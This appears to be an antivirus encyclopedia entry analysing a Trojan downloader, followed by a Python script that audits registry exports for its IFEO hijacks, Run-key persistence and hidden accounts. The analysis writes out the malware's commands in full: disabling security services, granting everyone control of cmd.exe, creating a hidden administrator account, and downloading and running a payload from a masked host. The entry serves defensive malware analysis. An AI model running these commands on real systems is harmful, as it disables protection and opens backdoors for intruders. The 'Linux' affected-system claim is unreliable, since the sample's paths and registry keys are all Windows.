Virus name: Win32.Troj.Downloader.vb.81920
Chinese name: 肉鸡猎人变种 (Zombie Hunter variant)
Virus type: Trojan downloader
Virus length: 81920
All names for this virus:

Affected systems:
Win9x, WinMe, Linux

Summary:
1. Drops virus files C:\Por.aed and C:\Documents and Settings\fish\Local Settings\Temporary Internet Files\Content.IE5\2PF3QNZE\CA05MZGT.htm

Behavior analysis:
This is a Trojan downloader. To hide itself, the names and description strings it uses are chosen to look like normal system information. Besides downloading a large number of other viruses, it severely damages the system, shuts down some security software, image-hijacks (IFEO) many programs, and attempts to set up a backdoor.
Description:
1. Drops virus files

C:\Por.aed
C:\Documents and Settings\fish\Local Settings\Temporary Internet Files\Content.IE5\2PF3QNZE\CA05MZGT.htm
C:\Documents and Settings\fish\Local Settings\Temporary Internet Files\Content.IE5\C4DGV5NI\gx[1].jpg
C:\Documents and Settings\fish\Local Settings\Temporary Internet Files\Content.IE5\R146ZVU7\notepde[1].jpg
C:\Program Files\360safe\safemon\safemes.dll
C:\WINDOWS\SoundMan.exe
C:\WINDOWS\system32\interne.exe
C:\WINDOWS\system32\Man.exe
C:\WINDOWS\system32\no1.ini
C:\WINDOWS\system32\note2.ini
C:\WINDOWS\system32\notepde.exe
C:\WINDOWS\system32\qoq.exe
C:\WINDOWS\system32\ttjj5.ini

2. Creates and starts a service that loads the file, so it runs at system startup

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SoundMan = SoundMan.exe

Image-hijacks a large number of programs: adds Image File Execution Options entries for 360Loader.exe, 360Safe.exe, 360tray.exe, IceSword, Iparmor.exe, kmailmon.exe, ras, runiep and others with "Debugger"="svchost.exe", and adds ctfmon.exe with "Debugger"="SoundMan.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Loader.exe  Debugger "svchost.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe  Debugger "svchost.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe  Debugger "svchost.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe  Debugger "SoundMan.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword  Debugger "svchost.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Iparmor.exe  Debugger "svchost.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kmailmon.exe  Debugger "svchost.exe"
...
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ras  Debugger "svchost.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep  Debugger "svchost.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe  Debugger "svchost.exe"

Modifies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL so that hidden files are not displayed

Deletes the startup entries of security software under

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

kav, KavPFW, vptray, runeip, RavTask, RfwMain, 360Loader.exe, ras, 360Safe.exe, 360Safetray

3. The URLs of the files the virus generates are obtained by decrypting strings

CA05MZGT.htm
gx[1].jpg
notepde[1].jpg

4. Enumerates processes to check whether the sniffing tools "fint2005.exe", "ehsniffer.exe" or "iris.exe" are running; whether or not they are, it waits 10 minutes and then connects to the network

Uses InternetOpenUrlA and InternetReadFile to read the list in http://xxxxxxxx.com/rc/1500/gx[1].txt, downloads http://xxxxxx.com/rc/1500/gx[1].jpg to c:\windows\system32\vbb.exe and runs it

Runs "cacls.exe C:\WINDOWS\system32\cmd.exe /e /t /g everyone:F", which gives the Everyone group (that is, all users) full control of cmd.exe,

then runs

cmd.exe /c net stop wscsvc&net stop sharedaccess&sc config sharedaccess start= disabled&sc config wscsvc start= disabled&net stop KPfwSvc&net stop KWatchsvc&net stop McShield&net stop "Norton AntiVirus Server"

to stop the services of security software.

5. Searches the process list for kmailmon.exe, kavstart.exe, shstat.exe, runiep.exe, ras.exe, MPG4C32.exe, imsins.exe, Iparmor.exe, 360safe.exe, 360tray.exe, cacls.exe and ccenter.exe and kills them with TerminateProcess

6. Runs "cmd.exe /c net user new1 12369 /add&
net user new1 12369&
net user new1 /active:yes&
net localgroup administrators /add"

This adds an administrator account new1 with password 12369, writes this information to %windir%\1.inf, then calls rundll32.exe to modify the Help and Support service to C:\WINDOWS\system32\interne.exe, and deletes 1.inf. It hides the temporary logon user new1 by adding the value

"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\new1" = 0 (1 shows the account)

If the account cannot be created, the user is deleted with "cmd.exe /c net user new1 /del"

7. Visits "http://webipcha.cn/ip/ip.asp" to obtain the current external IP, then runs "cmd /c route print|find "Default Gateway: ">c:\ip.txt"

to write the gateway address to c:\ip.txt, reads the gateway address back from the file, and deletes the file.

8. Checks whether avp.exe is among the running processes; if it is, changes the system date to 15 July 2001

9. Drops the scanner qoq.exe (Dotpot PortReady Ver1.6) into %windir%/system32/ and scans all hosts with port 135 open in the class C ranges above and below the gateway,

recording the results in Por.aed; it also scans 4 class C ranges of the external IP, then runs "cmd.exe /c move "c:\Por.aed" "%SystemRoot%\system32\Por.aed"&exit"

10. Drops popo.exe into the directory the virus is running from and reads the IP addresses with port 135 open from the Por.aed scan results: "cmd.exe /c start C:\popo.exe ip &exit"

(for example cmd.exe /c start C:\popo.exe 192.1**.18.15 &exit; popo.exe performs dictionary-based password cracking)

11. When scanning is finished, deletes qoq.exe, Por.aed and popo.exe
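As an added example (not part of the original entry or of any vendor tool), the following Python script audits a .reg export for the three registry tricks described in steps 2 and 6 above: IFEO "Debugger" hijacks, the SoundMan Run entry, and accounts hidden via SpecialAccounts\UserList. The .reg fragment is constructed for the demonstration and the severity labels are this example's own.

```python
import re

# Key fragments named in the analysis above (compared case-insensitively).
IFEO = "\\image file execution options\\"
RUN_SUFFIX = "\\currentversion\\run"
USERLIST_SUFFIX = "\\specialaccounts\\userlist"
SUSPECT_IMAGES = {"svchost.exe", "soundman.exe"}  # Debugger / Run images this sample uses

def parse_reg(text: str) -> dict[str, dict[str, str]]:
    """Parse a .reg export into {key: {value_name: raw_value}} (default '@' values skipped)."""
    keys: dict[str, dict[str, str]] = {}
    current = None
    for line in (ln.strip() for ln in text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and (m := re.match(r'"([^"]+)"=(.*)$', line)):
            keys[current][m.group(1)] = m.group(2)
    return keys

def basename(raw: str) -> str:
    return raw.strip('"').lower().rsplit("\\", 1)[-1]

def audit(reg: dict[str, dict[str, str]]) -> list[tuple[str, str]]:
    """Flag IFEO Debugger hijacks, the SoundMan Run entry and hidden logon accounts."""
    findings: list[tuple[str, str]] = []
    for key, values in reg.items():
        lk = key.lower()
        if IFEO in lk and "Debugger" in values:
            victim = key.rsplit("\\", 1)[-1]
            sev = "HIJACK" if basename(values["Debugger"]) in SUSPECT_IMAGES else "REVIEW"
            findings.append((sev, f"IFEO {victim} -> {values['Debugger']}"))
        elif lk.endswith(RUN_SUFFIX):
            findings += [("PERSIST", f"Run\\{n} = {v}") for n, v in values.items()
                         if basename(v) in SUSPECT_IMAGES]
        elif lk.endswith(USERLIST_SUFFIX):
            # A 0 here hides the account from the logon UI (the page: 0 = hidden, 1 = shown).
            findings += [("HIDDEN_ACCOUNT", f"UserList\\{n}") for n, v in values.items()
                         if v.lower() == "dword:00000000"]
    return findings

# Constructed .reg fragment mirroring the keys in the analysis (not a real capture).
SAMPLE_REG = r'''[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe]
"Debugger"="svchost.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe]
"Debugger"="SoundMan.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\Tools\\windbg.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMan"="SoundMan.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"new1"=dword:00000000
'''
```

Run `audit(parse_reg(SAMPLE_REG))` on an export produced with `reg export HKLM\SOFTWARE\Microsoft\Windows` to triage a suspect machine; the notepad.exe entry shows that a legitimate debugger is reported as REVIEW rather than HIJACK.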
